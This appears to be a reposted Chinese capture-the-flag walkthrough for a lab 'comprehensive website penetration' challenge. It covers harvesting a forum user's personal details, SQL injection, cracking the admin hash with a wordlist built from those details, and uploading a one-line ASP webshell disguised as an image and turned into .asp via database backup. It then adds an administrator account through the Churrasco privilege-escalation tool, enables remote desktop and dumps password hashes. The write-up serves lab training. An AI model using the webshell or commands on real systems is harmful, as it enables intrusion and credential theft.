02-在线挑战详细攻略-《网站综合渗透实验》

作者:独狼1927
来源:02-在线挑战详细攻略-《网站综合渗透实验》

系列文章:
01-在线挑战详细攻略-《我很简单,请不要欺负我》
03-在线挑战详细攻略-《又见DZ,我能拿你怎么办》
04-在线挑战详细攻略-《2015中国网络安全大赛:Reinstall真题》
05-在线挑战详细攻略-《2015中国网络安全大赛:框架漏洞真题》

<h1>Step 0</h1>
实验环境
操作机:Windows XP [172.16.11.2]
目标网址:www.test.com [172.16.12.2]
ps:www.test.com www.test.ichunqiu都是可以的

实验工具:
中国菜刀 ipscan MD5Crack2
Domain3.6 NTscan字典 saminside
SuperScan30 X-Scan-v3.3
亦思想社会工程学字典生成器
本实验要求获取www.test.com网站的服务器权限。
ps:图片可单击放大观看。

<h1>Step 1</h1>
从题目要求可以看出,这个实验明显是要突出社会工程学,所以搜集信息就是必须的了,尽可能的搜集!
打开浏览器,进入网站首页,眼尖的童鞋会发现菜单最右边写着 [摄影论坛],果断进入论坛转转;

进入论坛后,寻找与linhai有关的信息,发现有他发表的文章,点击斑竹名称 [linhai];
额~ 没有登录还不能查看,那就果断注册吧!点击左侧的[注册] 菜单进入注册页面,不要点上边的注册,进不去;
点击页面下方的 [我同意] 进行下一步;(不同意不行啊^_^)
把表单中带星星的都填上,最重要的是记住用户名和密码,别刚注册完就忘了~ (芸芸众生中这样的事情经常发生)
填完点击 [申请] 进行提交;注册完有了自己的账号后,你就可以看到linhai的信息了,用户名就不用说了,问题里已经给了;

注意签名栏:生于唐山大地震!中国人应该都知道唐山大地震是哪一年发生的吧~

Paste_Image.png

Linhai的出生年份已经搞定,回到秋潮视觉工作室首页,页面底部有linhai的电子邮箱,0812很有可能就是linhai的生日;还有他的QQ号:1957692;
综上所述,我们目前获得的信息包括:
用户名:Linhai
出生日期: 1976年08月12日
Email:linhai0812@21cn.com
QQ:1957692
顺带着发现了后台入口…

点击 [管理入口] 就可以进入后台登录页面;
Paste_Image.png

当然绝大多数后台是不会直接爆出来的,得用工具;
目录扫描
工具:御剑 路径:C:\Tools\目录扫描
打开御剑,在域名中输入http://www.test.com,开始扫描

在目录列表中查找后台,发现存在/admin/login.asp
回到后台登录页面,当然用户名和密码都不知道,利用我们之前获得的社工信息,加上注入,进一步获取用户名和密码。

<h1>Step 2</h1>

工具:旁注WEB综合检测程序Ver3.6修正版
路径:C:\Tools\注入工具\Domain3.6\Domain3.6.exe

打开工具,依次点击 [SQL注入] -->[批量扫描注入点] --> [添加网址] --> [批量分析注入点];
出现下面这个对话框说明已经检测完毕;
点击OK进行下一步;
注入点分析完毕后,会在下方列表中显示可注入的地址,选择其中一个地址,右键选择[检测注入];
检测完毕后,显示可以注入,并列出了数据库类型:Access数据库;
下面开始逐步 [猜解表名] -->[猜解列名]--> [猜解内容]; 点击 [猜解表名] 后,在数据库列表中会显示3个表,分别是admin、news和config;
选择admin表,点击 [猜解列名],成功猜解出三个列名id、admin和password;
勾选admin和password,点击 [猜解内容],右侧列表中成功显示用户名linhai,密码d7e15730ef9708c0
下一步,打开字典生成器,生成字典; 工具:亦思想社会工程学字典生成器 路径:C:\Tools\社会辅助\亦思想社会工程学字典生成器\亦思想社会工程学字典生成器.exe
打开社工工具亦思想社会工程学字典生成器,输入之前获得的社工信息,生成字典;
点击 [生成字典] 之后,会在工具同一目录下生成mypass.txt,这个就是我们需要的字典;
打开MD5破解工具,准备破解; 工具:MD5Crack2.exe 路径: C:\Tools\破解工具\MD5\ MD5Crack2.exe
打开破解工具,输入我们获得的密码密文,选择 [使用字典];
点击 [浏览] 按钮,选择刚刚生成的社工字典mypass.txt;注意,如果找不见文件,在文件类型中选择全部文件;
点击 [开始] 按钮进行暴力破解,运气很好,秒破!
也可以直接上网进行破解,打开[http://www.somd5.com](http://www.somd5.com/),输入让你无语的MD5:d7e15730ef9708c0,因为有人提交过,也是秒破;
成功找到明文密码:linhai19760812 下一步:登录后台,上传木马,GETSHELL;

<h1>Setp3</h1>
打开后台登录页面,输入用户名linhai,密码linhai19760812,输入验证码,点击 [登陆] 按钮登录后台;

成功进入后台
点击 [设置管理] --> [系统变量设置],发现系统设置中有上传图片的地方,下一步,构造图片木马;

在桌面上新建一个文本文件,在里面写入一句话木马
<code><%Eval Request("ichunqiu")%></code>
后面随便输入一些内容,纯粹是为了增加图片体积,但要注意,几十Kb足矣,体积太大太小都不行;

然后将文件重命名为jpg格式文件;
打开后台页面,点击 [上传图片],把刚才构造的图片传上去;
然后点击 [生成代码];
代码生成后,复制图片路径![很重要]
关键步骤到了!点击左侧菜单 [数据管理]-->[备份/恢复数据库],把 [数据库路径] 修改为刚才复制的图片路径,[备份的数据库路径] 修改为后缀名为asp的文件,文件名自己取,记住就行,然后点击备份;[ 特别注意:两个路径的最前面都有斜杠 ]
备份成功!
Paste_Image.png

打开 [中国菜刀] 连接一句话木马;
工具:中国菜刀 路径:C:\Tools\webshell\中国菜刀\chopper.exe


Paste_Image.png
打开菜刀,右键空白处,选择 [添加];
在地址栏中输入刚才备份数据库的路径,填写连接密码 [密码在一句话里],点击 [添加];
添加成功后会新增一条记录;
双击这个URL,成功进入!那个test.asp就是卧底!

下一步,添加账户-->开启3389-->远程桌面连接-->获取管理员账户密码;

<h1>Step 4</h1>
进入C:\RECYCLER目录,准备上传提权工具;

Paste_Image.png

提权工具包括Churrasco.exe,3389,cmd,路径:C:\Tools\提权工具\windows

Paste_Image.png

Churrasco.exe 中文名:巴西烤肉!
Churrasco.exe是Windows2003系统下的一个本地提权漏洞,通过此工具可以以SYSTEM权限执行命令,从而可以达到添加用户的目的。
补丁名:KB956572 MS09-012
使用方法:
<code>Churrasco "net user hacker 123 /add && net localgroup administrators hacker /add"</code>
两行命令的意思分别是:
netuser hacker 123 /add -->添加一个用户名为hacker、密码为123的账户;
netlocalgroup administrators hacker /add -->将账户hacker添加到管理员组;
开始上传工具,选中这三个文件,用鼠标直接拖到中国菜刀中,即可完成上传;

Paste_Image.png

下一步,执行提权操作;右键cmd.exe,选择 [虚拟终端]

Paste_Image.png

成功进入,将目录切换到C:\RECYCLER

Paste_Image.png

用Churrasco.exe执行cmd命令,添加账户;
<code>Churrasco "net user hacker 123 /add"</code>

Paste_Image.png

账户添加成功,继续下一步,将新增的账户添加到管理员组;
<code>Churrasco "net localgroup administrators hacker /add"</code>

Paste_Image.png

添加成功,下一步,开启3389;
<code>Churrasco 3389</code>

Paste_Image.png

如果出现如上图中的命令,说明执行成功了,不成功就多执行几次命令,下一步,连接目标机;
[开始]-->[运行]-->mstsc

Paste_Image.png

如果找不见目标IP地址,请点击右上角 [场景拓扑图] 进行查看:

Paste_Image.png

输入目标IP地址:172.16.12.2,开始连接,继续输入用户名hacker和密码123,进入系统;

Paste_Image.png
Paste_Image.png

3389连接成功!下一步,获取系统管理员密码,准确的说是获取系统管理员密码的hash,上传密码获取工具 [中国菜刀];
工具很多,这里我们使用Pwdump7;

Paste_Image.png

工具:Pwdump7 路径: C:\Tools\提权工具\hash\Pwdump7;[ 注意,一定要将libeay32.dll一并上传,否则执行不了 ]

Paste_Image.png

上传成功!

Paste_Image.png

进入目标机,将CMD目录切换到RECYCLER,运行一条命令:
<code>Pwdump7 > hash.txt</code>

Paste_Image.png

运行成功后,会在同一目录下生成一个文本文件hash.txt;

Paste_Image.png

打开hash.txt,成功获取到administrator的hash:
3C8D6C158F6FB3D1FDCFC2AFB2D1BE34:594B9CD2577A5AC2BE0CA522D5EC6ACE

Paste_Image.png

暂时切换出实验环境,在你的电脑上打开浏览器输入
http://www.objectif-securite.ch/en/ophcrack.php,在页面的相应位置输入hash,然后GO
ps:如果打不开就翻墙,或者用其他类似功能的网站也可以,这样的站很多;

Paste_Image.png

最终输出结果:

Paste_Image.png

<h1>Step 5</h1>
数据库sa密码在哪找?
WEB应用与数据库之间会有一个配置文件,用来保存数据库连接信息,包括数据库驱动、数据库名、用户名、密码等信息,找到这个文件就找到了密码
文件名:conn_old.asp
路径: C:\Inetpub\wwwroot\conn_old.asp

Paste_Image.png

打开文件即可见到Password;

Paste_Image.png

<h1>Step 6</h1>
Linhai论坛登录密码在哪里?
进入C:\Inetput\wwwroot\bbs\Data
发现有ldb文件,一般情况下肯定有mdb文件,看体积应该是dtxy.asp这个文件;

Paste_Image.png

把这个文件通过菜刀下载到本地,用Domain3.6或其他数据库浏览器工具查询即可;

Paste_Image.png

把dtxy.asp修改为数据库文件dtxy.mdb;

Paste_Image.png

打开Domain3.6,点击 [数据库管理]-->[文件]-->[打开数据库],找到文件dtxy.mdb并打开;

Paste_Image.png

找到表LeadBBS_User,第三条记录就是linhai,密码hash:e10adc3949ba59abbe56e057f20f883e

Paste_Image.png

暂时撤出实验环境,用你本机的浏览器打开http://www.cmd5.com,输入密文,点击破解~

Paste_Image.png

本次实验到此结束,希望对大家有所帮助,有不足之处请多多指正!
下一讲:《又见DZ,我能拿你怎么办》

ps:部分知识点的内容转自网络;路漫漫其修远兮,感谢一路上黑友们的帮助@lonnyboy;
Dareand the world always yields.

--END--
本文来自:i春秋社区

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 199,636评论 5 468
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 83,890评论 2 376
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 146,680评论 0 330
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 53,766评论 1 271
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 62,665评论 5 359
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,045评论 1 276
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,515评论 3 390
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,182评论 0 254
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,334评论 1 294
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,274评论 2 317
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,319评论 1 329
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,002评论 3 315
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,599评论 3 303
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,675评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 30,917评论 1 255
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 42,309评论 2 345
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 41,885评论 2 341

推荐阅读更多精彩内容